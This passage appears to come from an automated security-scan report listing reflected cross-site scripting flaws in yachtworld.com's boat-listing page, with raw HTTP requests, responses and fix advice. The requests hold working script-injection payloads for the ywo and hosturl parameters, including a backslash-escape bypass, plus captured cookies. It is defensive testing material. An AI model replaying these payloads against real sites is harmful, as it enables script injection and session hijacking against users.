savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:30 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=donnellyyachts&&ywo=donnellyyachtsc9a12'><script>alert(1)</script>80081d41593&slim=broker&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url='>
...[SNIP]...

3.462. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the &ywo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4da77\'%3balert(1)//4ba75b63cdb was submitted in the &ywo parameter. This input was echoed as 4da77\\';alert(1)//4ba75b63cdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts4da77\'%3balert(1)//4ba75b63cdb&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:33 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=donnellyyachts&&ywo=donnellyyachts4da77\\';alert(1)//4ba75b63cdb&slim=broker&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url=\'>
...[SNIP]...

3.463. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload ba7e9--><script>alert(1)</script>5bfa0008261 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachtsba7e9--><script>alert(1)</script>5bfa0008261&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:20 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 19189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>5bfa0008261/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachtsba7e9-->
...[SNIP]...

3.464. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 6d952<script>alert(1)</script>4336f410bcb was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts6d952<script>alert(1)</script>4336f410bcb&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:19 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 19109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts6d952<script>alert(1)</script>4336f410bcb/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/donnellyyachts6d952<script>
...[SNIP]...

3.465. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the hosturl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4560\'%3balert(1)//866d6156778 was submitted in the hosturl parameter. This input was echoed as a4560\\';alert(1)//866d6156778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachtsa4560\'%3balert(1)//866d6156778&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 